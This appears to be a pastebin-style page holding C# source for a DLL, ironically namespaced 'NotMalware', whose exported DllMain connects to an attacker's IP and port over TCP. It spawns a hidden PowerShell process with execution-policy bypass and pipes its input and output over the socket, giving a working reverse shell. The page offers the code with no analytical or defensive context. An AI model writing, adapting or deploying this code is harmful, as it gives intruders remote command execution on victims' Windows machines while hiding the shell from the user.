Untitled
unknown
plain_text
a year ago
2.6 kB
3
Indexable
using System.Diagnostics;
using System;
using System.IO;
using System.Net.Sockets;
namespace NotMalware
{
internal class Program
{
private static StreamWriter streamWriter;
[DllExport("DllMain")]
public static void DllMain()
{
try
{
// Connect to <IP> on <Port>/TCP
TcpClient client = new TcpClient();
client.Connect("IP", PORT);
// Set up input/output streams
Stream stream = client.GetStream();
StreamReader streamReader = new StreamReader(stream);
streamWriter = new StreamWriter(stream);
// Define a hidden PowerShell (-ep bypass -nologo) process with STDOUT/ERR/IN all redirected
Process p = new Process();
p.StartInfo.FileName = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe";
p.StartInfo.Arguments = "-ep bypass -nologo";
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.RedirectStandardInput = true;
p.OutputDataReceived += new DataReceivedEventHandler(HandleDataReceived);
p.ErrorDataReceived += new DataReceivedEventHandler(HandleDataReceived);
// Start process and begin reading output
p.Start();
p.BeginOutputReadLine();
p.BeginErrorReadLine();
// Re-route user-input to STDIN of the PowerShell process
// If we see the user sent "exit", we can stop
string userInput = "";
while (!userInput.Equals("exit"))
{
userInput = streamReader.ReadLine();
p.StandardInput.WriteLine(userInput);
}
// Wait for PowerShell to exit (based on user-inputted exit), and close the process
p.WaitForExit();
client.Close();
}
catch (Exception) { }
}
private static void HandleDataReceived(object sender, DataReceivedEventArgs e)
{
if (e.Data != null)
{
streamWriter.WriteLine(e.Data);
streamWriter.Flush();
}
}
}
}Editor is loading...
Leave a Comment